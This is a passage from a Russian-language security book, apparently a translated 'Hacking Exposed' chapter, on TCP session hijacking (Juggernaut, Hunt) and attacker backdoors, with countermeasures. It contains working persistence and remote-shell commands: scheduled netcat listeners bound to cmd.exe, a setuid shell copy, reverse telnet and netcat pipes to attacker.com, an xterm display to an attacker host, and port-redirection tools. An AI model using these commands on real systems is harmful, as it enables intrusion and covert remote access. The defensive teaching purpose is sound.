    Одна из первых попыток применить на практике теорию захвата TCP была предпринята Майком Шиффманом (Mike Schiffman), в результате чего появился продукт Juggernaut (возможно, многие вспомнят Майка по его предыдущей программе. Появление этого бесплатного программного продукта оказалось революционным в том отношении, что с его помощью можно было "шпионить" за соединением TCP, а затем на некоторое время его захватывать. Это позволило взломщикам вводить команды в качестве легитимного пользователя. Например, если сетевые устройства используются в сети с множественным доступом, то взломщики могут отслеживать соединения, а затем перехватить сеанс telnet или ввести пароль для устройств Cisco.

    Juggernaut
    ?) Help
    0) Program information
    1) Connection database
    2) Spy on a connection
    3) Reset a connection
    4) Automated connection reset daemon
    5) Simplex connection hijack
    6) Interactive connection hijack
    7) Packet assembly module
    8) Souper sekret option number eight
    9) Step Down

    Одной из лучших возможностей программы Juggernaut является функция simplex connection hijack (захват симплексного соединения). Эта возможность позволяет взломщику посылать команды в локальную систему. Применение режима interactive connection hijack (захват интерактивного соединения) всегда было затруднено, поскольку из-за большого потока сообщений АСК связь часто прерывалась. Однако зачастую возможности захвата симплексного соединения оказывается вполне достаточно. Она позволяет взломщику отправить, например, команду enable password О hello, которая выполнится на удаленном узле и отменит шифрование пароля.

    Hunt



    Утилита Hunt (ее можно найти на Web-узле http://www.cri.cz/-kra/index.html#HUNT) — это еще одна программа перехвата, отличающаяся стабильностью работы. Ее автор, Павел Крауз (Pavel Krauz) создал замечательную программу, которая наглядно демонстрирует недостатки протокола TCP.
    Как и Juggernaut, программа Hunt позволяет взломщику легко следить за соединением и, таким образом, выведывать такую ценную информацию, как пароли. Как это происходит, видно из следующего примера.

    --- Main Menu---rcvpkt 1498, free/alloc pkt 63/64 ---
    1/w/r) list/watch/reset connections
    u) host up tests
    a) arp/simple hijack (avoids ack storm if arp used)
    s) simple hijack
    d) daemons rst/arp/sniff/mac
    o) options
    x) exit
    > w
    0) 172.29.11.207 [1038] -> 172.30.52.69 [23]
    1) 172.29.11.207 [1039] -> 172.30.52.69 [23]
    2) 172.29.11.207 [1040] -> 172.30.52.66 [23]
    3) 172.29.11.207 [1043] -> 172.30.52.73 [23]
    4} 172.29.11.207 [1045] -> 172.30.52.74 [23]
    5) 172.29.11.207 [1047] -> 172.30.52.74 [23]
    choose conn> 2
    dump [s]rc/[d]st/[b]oth [b]> s
    CTRL-C to break
    uname -a su
    hello
    cat /etc/passwd

    В процессе наблюдения за сеансом telnet в системе UNIX взломщик может получить ценную информацию, например (как видно из предыдущего примера) пароль пользователя root. Утилита Hunt предоставляет также возможность передачи команд на удаленный узел и их выполнения. Например, взломщик может передавать команды, а результат их выполнения будет отображаться только на его компьютере, что в значительной мере затрудняет его обнаружение.

    ---Main Menu--- rcvpkt 76, free/alloc pkt 63/64---
    1/w/r) list/watch/reset connections u) host up tests
    a)arp/simple hijack (avoids ack storm if arp used)
    s) simple hijack
    d) daemons rst/arp/sniff/mac
    o) options x) exit > s
    0) 172.29.11.207 [1517] --> 192.168.40.66
    [23] choose conn>0
    dump connection y/n [n]>n
    dump [s]rc/[d]st/[b]oth [b]>
    print src/dst same characters y/n [n]>
    Enter the command string you wish executed or [cr]>
    cat /etc/passwd cat /etc/passwd
    root:rhayrl.AHfasd:0:1:Super-User:/:/sbin/sh daemon:x:
    1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/
    :adm:x:4:4:Admin:/var/adm:
    Ip:x:71:8:Line Printer Admin:/usr/spool/lp:
    uucp:x:5:5:uucp Admin:/usr/lib/uucp:
    nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/
    uucp/uucicc listen:x:37:4:Network Admin:/usr/net/nls:
    nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:
    No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/:
    sm:a401ja8fFla.;:100:1::/export/home/sm:/bin/sh
    [r]eset connection/[s]ynchronize/[n]one [r]>n
    done

    Как видно из приведенного примера, на удаленный узел может быть передана довольно коварная команда (cat /etc/passwd), а полученный результат отобразится лишь на компьютере взломщика.

    Контрмеры против захвата соединений



    Применение шифрующих коммуникационных протоколов, например IPSec или SSH, позволит значительно снизить или свести к нулю эффективность таких перехватов данных. Когда-то считалось, что технология сетей с коммутацией пакетов обеспечивает адекватную защиту от взломов подобного рода, но с тех пор средства сетевого мониторинга стали настолько хитроумными, что при определенных обстоятельствах они позволяют добиться желаемого результата (см. описание утилиты dsnif f в главе 8). Поэтому кодирование информации является самой лучшей защитой.


    3. "Потайные ходы"



    "Потайные ходы"


    Если непрошеные гости обоснуются в системе, избавиться от них бывает трудно. Даже если брешь, которой они воспользовались, будет найдена и закрыта, злоумышленники могут обеспечить специальный механизм и быстро получить доступ в любое время. Такой механизм называется потайным ходом (back door).
    Выявление и устранение такого потайного хода — задача почти неосуществимая, поскольку его можно создать самыми разнообразными способами. Единственной реальной возможностью восстановления системы после взлома является повторная установка операционной системы с исходных носителей и выполнение долгой и кропотливой работы по восстановлению пользовательских данных и приложений с проверенных резервных копий. При этом полное восстановление осуществить очень трудно, особенно, если система имела нестандартную конфигурацию, которая не была документирована.
    В следующих разделах описаны основные механизмы, которые используются злоумышленниками для сохранения контроля над системой. Знание этих методов поможет администратору быстро идентифицировать такие вторжения и по возможности сократить трудоемкость процесса восстановления. Где это необходимо, мы представим подробное описание возможных подходов, однако в основном предполагается дать как можно более полный обзор популярных методов.

    Создание фиктивных учетных записей



    Почти каждому системному администратору известно, что учетные записи с правами суперпользователя — это такие ресурсы, которые легко защищать и контролировать. А вот учетные записи, равные по привилегиям суперпользователю, но имеющие неприметные имена, отследить намного труднее. Злоумышленник обязательно попытается создать такие учетные записи.

    NT/2000



    В Windows NT/2000 привилегированные локальные учетные записи легко создать с помощью следующих команд.

    net user <имя_пользователя><пароль>/ADD
    net localgrcup <имя_группы><имя_пользователя>/ADD

    С помощью команды net group можно добавить пользователя в глобальную группу. Вспомните, что в системе NT есть отличие между локальной (содержащейся только в локальной базе данных SAM) и глобальной (из доменной базы данных SAM) группами. Встроенные локачьные группы обычно предоставляют более широкие возможности, поскольку с их помощью можно предоставлять различный уровень доступа к системным ресурсам. В операционную систему Win 2000 добавлены новые универсальные группы и локальные группы домена. По сути, эти понятия являются метадоменными, так как они могут быть членами любого домена, принадлежащего дереву или лесу.
    Вывести список всех членов основных административных групп так же легко, как и добавить в них новую учетную запись. Как показано в следующем примере, в котором на экран выводится список членов группы Windows 2000 Enterprise Admins (администраторы предприятия), это можно сделать с помощью команды net [local] group.

    C:\>net group "Enterprise Admins"
    Group name Enterprise Admins
    Comment Disighated administrators of the enterprise
    Members
    ------------
    Administrator
    The command completed successfully.

    В первую очередь нужно просмотреть встроенные группы: Administrators, Domain Admins, Enterprise Admins и Schema Admins (на контроллерах домена), а также различные локальные группы операторов.

    UNIX



    В системе UNIX фиктивные учетные записи создаются и идентифицируются аналогичным образом. Как правило создаются безобидные учетные записи с нулевыми значениями идентификаторов UID и GID. Следует проверить также учетные записи с таким же идентификатором GID, что и у пользователя root, а затем проверить совпадение свойств групп в файле /etc/groups. Кроме того, такие учетные записи легко выявить по содержимому файла /etc/passwd.

    Novell



    В системе NetWare типичным является создание "осиротевших" объектов, т.е. создание, например, контейнера с одним пользователем, а затем передача этому новому пользователю прав опекунства над родительским контейнером. Если взломщик имеет возможность постоянно регистрироваться в дереве NDS, то эту ситуацию не сможет исправить даже администратор. Более подробную информацию о "потайных ходах" системы NetWare можно найти в главе 7.

    Загрузочные файлы



    В предыдущих главах много говорилось о "потайных ходах", которые создаются с помощью механизмов загрузки, поддерживаемых различными платформами. Такой способ стал излюбленным методом злоумышленников, поскольку он позволяет устанавливать ловушки, которые активизируются при каждом перезапуске системы неосмотрительными пользователями.

    NT/2000



    В операционной системе Windows NT в первую очередь нужно проверить различные папки, находящиеся в папке Startup: %systemroot%\profiles\%username%\ start menu\programs\startup (папка All Users будет использоваться независимо от того, кто из пользователей зарегистрировался интерактивно). Кроме того, для запуска программ типа "троянский конь" или для установки "потайного хода" при каждом запуске системы взломщики могут воспользоваться параметрами системного реестра. Нужно проверить следующие параметры
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ 

    •  ...Run
    •  ...RunOnce
    •  ...RunOnceEx
    •  ...RunServices
    •  ...AeDebug 
    •  ...Winlogon

    В этих параметрах хранятся данные многих из потенциально опасных программ. Например, программа Back Orifice 2000 (ВО2К; см. ниже) устанавливается как служба удаленного администрирования (Remote Administrator Service) в параметре RunServices.
    Из предыдущих глав вы узнали, как можно создать "потайной ход" в системе NT с помощью драйверов устройств, загружающихся во время запуска системы. Драйвер пакета Invisible Keylogger Stealth (IKS) (iks.sys, конечно же, переименованный более подходящим образом) может быть скопирован в каталог %systemroot%\system32\ drivers. При этом программа будет запускаться вместе с ядром NT, благодаря чему на консоли пользователя этот процесс обычно остается невидимым. Программа также записывает несколько значений в системный реестр в HKLM\SYSTEM\Current-ControlSet\Services\iks (опять же, параметр iks может быть переименован взломщиком так же, как и сам файл драйвера). Если заранее сделать надежную резервную копию системного реестра (используя утилиту DumpReg компании Somarsoft), то можно легко выявить "следы присутствия" IKS. Просмотрев с помощью проводника Windows свойства драйвера IKS, можно также установить его происхождение.

    Использование броузера Web для загрузки кода



    Появление в мае 2000 года сценария ILOVEYOU, написанного на языке Visual Basic,  послужило свидетельством того, что есть и другие способы запуска исполняемого кода: это установка начальной страницы, загружаемой при запуске Web-броузера.
    Сценарий ILOVEYOU модифицировал параметры Internet Explorer так, чтобы в качестве начальной использовалась страница, с которой загружался исполняемый файл с именем wiN-BUGSFlx.exe. Этот файл загружался с одного из четырех различных адресов URL, выбранных случайным образом на базе следующего общего шаблона.

    http://www.skynet.net/-[переменная]/
    [длинная_строка_с_ненужной_информацией]/
    WIN-BUGSFlX.exe" 

    Данный адрес URL содержался в параметре системного реестра HKSU\Software\ Microsoft\Internet Explorer\Main\-Start Page. Этот сценарий изменял также несколько параметров системного реестра, включая тот, который запускает загруженные двоичные файлы при перезагрузке системы (предполагалось, что к нему был указан путь), и тот, который удаляет первоначальную страницу запуска.



    Рис. 14.1. В диалоговом окне Internet Explorer, содержащем предупреждающе сообщение, пользователь указывает, нужно ли загрузить файл на компьютер локально или запустить его с удаленного узла. Всегда устанавливайте режим Save this program to disk (сохранить программу на диске)!

    HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
    HKCUXSoftware\Microsoft\Internet Explorer\Main\Start Page\about:blank

    Конечно, в зависимости от степени доверчивости следующего пользователя, запускающего броузер, для выполнения этого файла перезагрузка может и не понадобиться. Последние версии Internet Explorer перед пересылкой определенных типов файлов, таких как исполняемые файлы . ЕХЕ и . СОМ, по умолчанию выводят на экран окно подтверждения. В зависимости от ответа пользователя на вопрос в диалоговом окне, показанном на рис. 14.1, данный файл может быть запущен сразу после начала работы Web-броузера.

    Контрмера: не запускайте исполняемые файлы, найденные в Internet!



    Должно быть понятно и без слов (хотя на протяжении многих лет это повторяется много раз): нужно быть предельно осторожным по отношению к исполняемым файлам, загружаемым из Internet. Запуск файлов с удаленного сервера — это путь, ведущий прямо к катастрофе. Вместо этого лучше загрузить их на свой компьютер локально, проверить на наличие вирусов, по возможности проанализировать содержимое (например, файлов сценариев или командных файлов), а затем протестировать их на какой-нибудь второстепенной системе.

    UNIX



    В системе UNIX взломщики часто помещают программы, предназначенные для создания "потайного хода", в файлы rc.d. Следует проверить каждый из таких файлов и убедиться, что в них не содержится ни одной незнакомой программы или такой, которая была бы недавно добавлена. Для внедрения ловушек может быть использован также файл inetd.conf. В этом файле находятся параметры демона inetd, суперсервера Internet системы UNIX, который при необходимости динамически запускает различные процессы, такие как FTP, telnet, finger и т.д. В этом файле также можно обнаружить подозрительные демоны.
    Другим методом определения изменений в системных файлах систем UNIX или NT является использование программы Tripwire (http://www.tripwire.com). Коммерческая версия этой популярной программы может работать на многих платформах, включая Windows NT 4.0 SP3 и выше, Red Hat Linux 6.1 и Solaris 2.6 и 7. Эта программа создает сигнатуру каждого автономно хранящегося файла. |£сли файл был изменен без ведома его владельца, то программа Tripwire сообщит, когда и как в него были внесены изменения.

    Novell



    Файлы startup.ncf и autexec.ncf системы NetWare позволяют определить, какие программы, параметры и загружаемые модули системы NetWare (NLM — NetWare Loadable Module) будут запущены при загрузке сервера. Взломщики могут отредактировать один или несколько файлов . NCF, которые вызываются из этих загрузочных файлов (например, файл Idremote.ncf) и, таким образом, создать "потайной ход", например запустить хакерскую программу rconsole. Поэтому периодически проверяйте каждый загрузочный файл, чтобы не упустить момент создания взломщиками "потайного хода".
    Загрузочные файлы — очень удобное, но далеко не единственное средство создания "потайного хода". Для этого подходят также очереди запланированных заданий. В системе Windows NT эта возможность обеспечивается службой Schedule, доступ к которой можно получить с помощью команды AT. Запланировав регулярный запуск требуемой программы, взломщики могут быть уверены, что нужная им служба будет всегда запущена и готова к работе.

    Запланированные задания



    Например, в системе Windows NT простой "потайной ход" можно реализовать, установив утилиту netcat, которая будет ежедневно запускаться в назначенное время.

    C:\>at\\192.168.202/44 12:ООА /every:!
    ""nc -d -L -р 8080 -е cmd.exe"

    Added a new job with job ID = 2

    С помощью этой команды каждый день в полдень будет инициироваться новая программа прослушивания порта 8080. Злоумышленник сможет без проблем подключиться к целевому компьютеру с помощью утилиты netcat и получить в свое распоряжение командную оболочку, периодически удаляя ранее запущенные экземпляры netcat. Кроме того, можно воспользоваться также командным файлом, чтобы сначала проверить, запущена ли утилита netcat, а затем при необходимости осуществить ее запуск.
    В системе UNIX планирование выполнения процессов осуществляется с использованием программы crontab. Она часто применяется для автоматизации трудоемкого процесса поддержки системы, но может быть использована также и для создания "потайных ходов". В большинстве систем UNIX файл crontab можно редактировать с помощью команды crontab -e, при этом данный файл будет открыт в определенном редакторе (который обычно задается с помощью переменных окружения VISUAL или EDITOR).
    Чаще всего "потайной ход" можно создать в системе, в которой программа crontab запускается с правами суперпользователя и используется для вызова командных файлов. Если для этих командных файлов взломщик задаст права доступа, позволяющие редактировать их посторонним пользователям, то он сможет легко вернуться в систему в качестве обычного пользователя и сразу же получить привилегии root. В файле crontab это можно осуществить с помощью следующих команд.

    ср /bin/csh /tmp/evilsh
    chmod 4777 /tmp/evilsh

    Контрмеры: защита от запланированных заданий



    Для того чтобы предотвратить эту атаку в системе NT, с использованием команды at проверьте список заданий на предмет наличия в нем несанкционированных заданий.

    С:\> at
    Status ID Day Time Command Line
    ---------------------------------
    0 Each 1 12:00 AM net localgroup administrators joel /add

    Затем с помощью следующей команды завершите подозрительные процессы с идентификатором 0. 
    C:\>at \\172.29.11.214 0 /delete
    Альтернативный способ заключается в завершении работы службы с помощью команды net stop schedule, а затем запрещении ее запуска с помощью команды Control Panel>Services.
    В системе UNIX представляющие опасность команды можно поискать в файлах crontab. Кроме того, проверьте права доступа, связанные с используемыми файлами и сценариями.

    Удаленное управление



    Вполне возможна ситуация, когда взломщик не сможет вернуться на целевой компьютер, даже обладая необходимыми регистрационными данными. Это может произойти, если некоторые служебные процессы сервера не выводят приглашения на регистрацию. Например, мало пользы от пароля root, если на взламываемом сервере отключены г-службы или telnet. Точно так же в системе Windows NT администратор по умолчанию получает очень ограниченные возможности удаленного управления. Поэтому первоочередная цель взломщика состоит в обеспечении механизмов повторного доступа.
    В большинстве случаев все, что действительно нужно взломщику, — это удаленная командная строка. Ниже представлен обзор средств, с помощью которых достаточно просто получить удаленный доступ к командной оболочке. Кроме того, учитывая широкую распространенность операционных систем с графическим интерфейсом и предоставляемую ими простоту управления, вы познакомитесь с инструментами, которые окажутся полезными и в этом случае.
    Контрмеры против средств удаленного управления приводятся в конце раздела, поскольку большинство из них можно применять для защиты от всех из описанных атак.

    netcat



    В этой книге ранее уже упоминался "швейцарский армейский нож", утилита netcat (ее версии как для системы NT, так и для UNIX можно найти по адресу http.//www. 10pht.com/~weld/netcat/index.html). С помощью этой программы можно незаметно прослушивать нужный порт, выполняя заранее определенные действия после установки удаленного соединения с системой. Утилита netcat окажется чрезвычайно мощным средством удаленного управления, если эти действия будут направлены на запуск командной оболочки. Затем злоумышленники могут подключиться с помощью netcat к заданному порту и получить в свое распоряжение командную оболочку. Команды запуска netcat в режиме прослушивания обычно скрытно помещаются в какой-нибудь загрузочный файл (см. предыдущий раздел), поэтому эта программа прослушивания портов будет активизироваться при каждой перезагрузке системы. Пример такого "потайного хода" показан на рис. 14.2, на котором виден параметр системного реестра Windows NT, приводящий к запуску утилиты netcat в процессе загрузки системы.

    Сообразительные взломщики обязательно замаскируют своего "троянского коня" netcat. Для этого можно дать программе какое-нибудь нейтральное имя, например ddedll32.exe, или такое, что администратор дважды подумает, прежде чем удалит такой файл.

    Параметр -L утилиты netcat дает возможность возобновить работу при многократном нарушении связи; при использовании ~d программа netcat запускается в скрытом режиме (без интерактивной консоли); а -е позволяет задать запускаемую программу, в данном случае командный интерпретатор NT cmd.exe. Параметр -р определяет прослушиваемый порт (в данном примере 8080). Версию программы netcat для системы UNIX можно легко настроить так. чтобы запускалась командная оболочка /bin/sh, что приведет к тому же результату. После этого взломщику останется только соединиться с портом, который прослушивается утилитой netcat, и получить в свое распоряжение удаленную командную оболочку.



    Рис. 14.2. В системном реестре NT4 установлено, что в процессе загрузки системы будет загружаться утилита netcat

    remote.exe (NT)



    Утилиту remote из набора NTRK можно запустить в качестве сервера, чтобы командная строка возвращалась любому аутентифииированному пользователю NT, который подключился с помощью соответствующего удаленного клиента. Эту программу очень просто установить (нужно просто скопировать файл remote.exe в системный каталог, например %systemroot%). Поэтому зачастую ее использование предшествует последующей установке более опасных программ, таких как графические утилиты удаленного управления или программы-регистраторы нажатия клавиш. Более подробно утилита remote.exe описана в главе 5.

    loki



    Программы loki и lokid, кратко рассмотренные в главе 11. предоставляют взломщикам простой механизм повторного получения доступа к взломанной системе, даже если она расположена позади брандмауэра. Оригинальность этих программ заключается в том, что клиент (loki) помещает команды взломщика (в основном это пакеты IP) в заголовки ICMP или UDP и отсылает их серверу (lokid), который выполняет их и возвращает результаты. Поскольку многие брандмауэры допускают прохождение на сервер пакетов ICMP и UDP, то инициированный взломщиком трафик зачастую без проблем проходит через брандмауэр. Сервер lokid запускается с помощью следующей команды.
    lokid -p -i v 1
    Затем для запуска клиента нужно ввести такую команду. loki -d 172.29.11.191 -p -i -v 1 -t 3
    Используемые совместно, утилиты loki и lokid обеспечивают постоянный "потайной ход" в систему, иногда даже через брандмауэр.

    Back Orifice и NetBus



    Хотя оба этих средства по своей природе являются графическими (NetBus даже предоставляет некоторые возможности по управлению рабочим столом), они главным образом удаленно вызывают функции программного интерфейса API. Так что лучше их расценивать их как инструменты создания "потайных ходов", предназначенные для выполнения удаленных команд, а не как графические утилиты удаленного управления. Возможности каждой из этих утилит описаны в главах 4 и 5. Здесь же мы лишь еще раз перечислим те места, в которых взломщики могут скрытно размещать эти средства, чтобы администраторам было легче их разыскать.
    Сервер Back Orifice (ВО) можно настроить так, чтобы он устанавливался и запускался под любым именем (по умолчанию используется имя [пробел] ,ехе). При этом в параметр HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersicn\RunServices добавляется новая запись, так что сервер ВО будет запускаться каждый раз при загрузке системы и прослушивать порт 31337, если не задано другого значения. (Угадайте, почему выбран именно этот порт?)
    Летом 1999 года вышла новая версия пакета Back Orifice. Back Orifice 2000 (BO2K. http://www.bo2k.com), обладающая всеми возможностями своей предшественницы, но с двумя примечательными особенностями. Его можно использовать в Windows NT/2000 (а не только Win 9.x), а, кроме того, имеется комплект инструментов разработчика, позволяющий создавать модификации программы, что значительно затрудняет ее обнаружение. По умолчанию программа ВО2К самостоятельно копируется в файл UMGR32.EXE каталога %systemroot% и прослушивает TCP-порт 54320 или UDP-порт 54321. При этом в списке процессов сервер ВО2К отображается под именем EXPLORER, что предотвращает попытки его удаления. Если программа работает в скрытом режиме, то она устанавливается в качестве службы с именем Remote Administration Service (служба удаленного администрирования) и в параметре системного реестра HKLM\SOFTWAREXMicrosoft\ Windows\CurrentVersion\RunServices содержатся соответствующие данные. При этом запуск "службы" выполняется при загрузке системы, л исходный файл удаляется. Все эти параметры легко изменить с помощью утилиты bo2kcfg.exe, которая входит в состав пакета.
    Программа NetBus также является достаточно легко настраиваемой, и в Internet можно найти несколько ее версий. По умолчанию исполняемый файл сервера называется patch.exe, хотя он может иметь и любое другое имя. Для того чтобы это серверное приложение запускалось каждый раз при загрузке системы, в параметр HKEY_LCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\Run помещается соответствующая запись. По умолчанию программой NetBus прослушивается порт TCP 12345 или 20034 (при желании эти значения также можно изменить).

    Контрмеры: защита против Back Orifice (и других программ)



    Попытки использования Back Orifice (а также служб FTP, telnet, SMTP, HTTP и т.д.) легко обнаружить, используя бесплатную утилиту фирмы Network Flight Recorder, которая называется BackOfficer Friendly (http://www.nfr.net/products/bof/). Эта программа с графическим интерфейсом работает в режиме прослушивания портов и сообщает обо всех попытках соединения с системой. Ее самой замечательной особенностью является режим Fake Replies (ложные ответы). При его использовании программа будет отвечать на telnet-запросы и записывать имена и пароли, с помощью которых взломщики пытаются получить доступ. Как видно из следующего рисунка, программа выполняет большую работу по отслеживанию попыток проникновения в систему.


    Если известен пароль, то программу ВО2К можно легко удалить на удаленном компьютере. Для этого с помощью клиентского приложения нужно соединиться с сервером, в диалоговом окне раскрыть папку Server Control и выбрать команду Shutdown Server с параметром DELETE.

    Перенаправление портов: реверсивный ceaнc telnet, netcat, datapipe, rinetd и fpipe



    В предыдущих разделах некоторые команды удаленного управления, основанные на использовании командного процессора, описывались в контексте прямых соединений. Теперь рассмотрим ситуацию, когда прямому вмешательству в систему что-то препятствует, например прямой доступ блокируется брандмауэром. Изобретательные взломщики могут обойти эти препятствия с помощью перенаправления портов (port redirection).
    Если взломщику удалось взломать брандмауэр, то с помощью перенаправления портов он сможет направить все пакеты на требуемый узел. Важно уяснить возможные последствия взломов этого типа, поскольку взломщик может получить доступ к любой системе, которая находится позади брандмауэра. Перенаправление функционирует по следующему принципу: ведется прослушивание определенных портов и перехваченные на них необработанные пакеты перенаправляются на нужный вторичный адрес. Ниже будут рассмотрены некоторые методы выполнения перенаправления портов вручную, используя такие утилиты, как telnet и netcat, а также такие специализированные средства перенаправления, как datapipe и rinetd.

    Реверсивный сеанс telnet



    Один из любимых взломщиками "потайных ходов" во взломанную систему может быть реализован с помощью демона telnet, входящего в комплект поставки многих версий UNIX. Так что эту программу даже не потребуется загружать. Мы называем этот способ реверсивный сеанс telnet, потому что в процессе его реализации утилита telnet используется для соединения с находящейся в режиме прослушивания утилитой netcat, запущенной на компьютере взломщика. Затем требуемые команды направляются на целевой узел, а результаты их выполнения — обратно.
    Чтобы реализовать реверсивное соединение telnet, на своем компьютере сначала нужно запустить два экземпляра утилиты netcat, используя для этого две отдельные команды.

    С:\> nc -w -1 -р 80
    D:\> nc -w -1 -р 25

    Затем на целевом узле следует использовать следующую команду UNIX,

    sleep 10000 | telnet 172.29.11.191 80 |
    /bin/sh | telnet 172.29.11.191 25

    В результате входные данные с порта 25 с помощью конвейера будут переданы локальной командной оболочке (которая выполнит полученные команды), а результаты снова через конвейер будут перенаправлены обратно, на порт 80 компьютера взломщика.

    Порты из предыдущего примера (80 и 25) используются стандартными службами (HTTP и SMTP соответственно). Поэтому обычно следующий через них поток сообщений свободно проходит через брандмауэр на многие внутренние узлы.

    Захват командной оболочки с помощью утилиты netcat



    Если на целевой компьютер можно поместить утилиту netcat, или если она там уже установлена, то можно воспользоваться аналогичным методом. Такой подход мы называем "захват командной оболочки", потому что его суть заключается в том, что на своем рабочем компьютере взломщик получает в полное распоряжение все функциональные возможности удаленной командной оболочки. Рассмотрим пример, когда в удаленной командной строке запускается следующая команда.

    nс attacker.com 80 | cmd.exe | nс attacker.com 25

    Если хакер на своем компьютере attacker.com с помощью утилиты netcat осуществляет прослушивание TCP-портов 80 и 25 и при этом порт 80 разрешает передачу входящих, а порт 25 — исходящих пакетов для компьютера-жертвы через брандмауэр, то эта команда позволяет "захватить" командную оболочку удаленной системы. На рис. 14.3 показан экран компьютера взломщика, где в верхнем окне на порт 80 передается команда ipconf ig, а результаты ее выполнения направляются в порт 25 и отображаются в нижнем окне.



    Рис. 14.3. Запустив утилиту netcat на компьютере взломщика (на рисунке показан его рабочий стол) и на целевом узле, можно "захватить" удаленную командную оболочку. Команды, которые вводятся в верхнем окне, выполняются на удаленной системе, а результаты их работы — в нижнем

    datapipe



    Реализация перенаправления портов с помощью утилиты netcat и ручная настройка этого процесса может оказаться довольно хлопотным делом. В Internet можно найти несколько программ, которые предназначены специально для этих целей. В системе UNIX очень популярна утилита datapipe. С ее помощью взломщик может обеспечить перенаправление данных так, чтобы пакеты принимались через порт 65000 и переадресовывались в систему NT (порт 139). Далее, на своем компьютере злоумышленник может настроить систему для выполнения прямо противоположных действий: запустить утилиту datapipe для прослушивания порта 139 и перенаправления сообщений на порт 65000 целевой системы. Например, для нападения на систему NT (172. 29.11.100), расположенную позади брандмауэра, на взломанном узле (172.29.11.2) нужно выполнить следующую команду.

    datapipe 65000 139 172.29.11.100

    Затем на собственном компьютере взломщику необходимо запустить утилиту datapipe для прослушивания порта 139 и пересылки полученных данных на порт 65000 взломанного узла.

    datapipe 139 65000 172.29.11.2

    Теперь через брандмауэр открыт доступ к системе NT (172.23.11. ICO). На рис. 14.4 показан пример реализации перенаправления портов и продемонстрирована эффективность этого метода. С помощью такого подхода можно обойти брандмауэры с фильтрацией пакетов, пропускающие сообщения, предназначенные для портов с большими номерами.

    rinetd



    Утилита rinetd — это "сервер перенаправления Internet", созданный Томасом Бутеллом (Thomas Boutell). Эта программа перенаправляет соединения TCP с одного IP-адреса и порта на другой. Таким образом, она. во многом похожа на программу datapipe. Программа работает как на базе интерфейса Win32 (включая Windows 2000), так и в системе Linux УТН..ПГ rinetd очень легко использовать: нужно просто создать конфигурационный файл, в котором указывается правило перенаправления. Этот файл имеет следующий формат

    адрес_привязки порт_прмвязки адрес_соединения порт_соединения

    Запустить программу можно с помощью команды rinetd -с <имя_конфигурационного_файла>. Так же как и datapipe, эта утилита может оказаться очень эффективной против неправильно настроенного брандмауэра.

    fpipe



    Утилита fpipe предназначена для передачи/перенаправления данных с порта TCP. Ее разработали авторы этой книги, занимающие ключевые позиции в компании Foundstone, Inc. Эта программа создает поток TCP. исходящий из выбранного пользователем порта. Она прекрасно подходит для перенаправления, представленного на рис. 14.4, и в системе Windows может послужить равноценной заменой программы datapipe, применимой только к UNIX.
    Одна из особенностей утилиты fpipe, отличающих ее от других средств перенаправления портов, которые можно использовать в системе Windows (таких как rinetd), заключается в возможности задания исходного порта передаваемого трафика. Чтобы оценить "проникающую" способность этой программы, нужно попробовать "обмануть" с ее помощью брандмауэр или маршрутизатор, которые пропускают поток сообщений лишь с определенных портов (например, пакеты с TCP-порта 25 могут обрабатываться почтовым сервером). Обычно в протоколе TCP/IP исходным портам, используемым для клиентских соединений, назначаются большие номера, а соответствующий поток сообщений фильтруется брандмауэром. Однако может оказаться, что брандмауэр пропускает трафик DNS (а в большинстве случаев это именно так). Тогда с помощью утилиты fpipe можно обеспечить прохождение этого потока с определенного исходного порта. В такой ситуации брандмауэр рассматривает этот поток как разрешенный и пропускает его.



    Рис. 14.4. Перенаправление портов

    Пользователи должны знать, что, если при задании порта-источника исходящего соединения был использован параметр -в и это соединение было закрыто, может оказаться невозможным установить его повторно (утилита fpipe сообщит, что адрес уже используется) до того момента, пока не истекут интервалы ожидания TIME_WAIT и CLOSE_WAIT, определяемые протоколом TCP. Эти интервалы ожидания могут варьироваться в диапазоне от 30 секунд до четырех минут и более, в зависимости от используемой версии операционной системы и ее версии. Эти интервалы ожидания определяются протоколом TCP и не являются ограничением самой утилиты fpipe. Причина возникновения такой ситуации заключается в том, что утилита fpipe пытается установить новое соединение с удаленным узлом с применением тех же комбинаций локальных IР-адреса/порта и удаленных IP-адреса/порта, что и в предыдущем сеансе. Новое же соединение не может быть установлено до тех пор, пока стеком протоколов TCP не будет решено, что предыдущее соединение не было полностью завершено.

    VNC



    Рассмотренные ранее средства удаленного управления предоставляют возможность практически полного контроля над системой. Поэтому при одной только мысли о возможности получения в свои руки виртуального рабочего стола целевой системы у взломщиков учащается сердцебиение. Программа Virtual Network Computing (VNC) предоставляет именно такие возможности. Кроме того, этот программный продукт легко установить на "захваченной" системе и использовать ее как "потайной ход", обеспечивающий получение доступа впоследствии.
    Пакет VNC разработан в лаборатории AT&T Laboratories Кембриджского университета, и, несомненно, является лучшим бесплатным графическим средством удаленного управления. В главе 5 было показано, как легко инсталлировать эту программу в Windows NT через удаленное сетевое соединение. Для этого нужно лишь установить службу VNC из командной строки, сделав перед этим единственное изменение в системном реестре, чтобы обеспечить ее скрытный запуск (версии выше 3.3.2 помешают пиктограмму на панель задач и могут быть легко обнаружены пользователями, которые зарегистрировались интерактивно). Конечно же, независимо от версии или выбранного режима процесс winVNC. EXE будет отображен в списке процессов.

    Взлом X Windows и других графических терминальных служб



    На узлах UNIX, на которых не ограничивается исходящий трафик приложения xtenn (TCP 6000). можно модифицировать некоторые из приведенных ранее методов перенаправления портов, чтобы "захватить" окно терминала и перенаправить таким образом оконную командную оболочку обратно на компьютер взломщика. Для этого достаточно запустить Х-сервер, а затем ввести следующую команду. 

    xterrn -display attacker.соm:0.О&

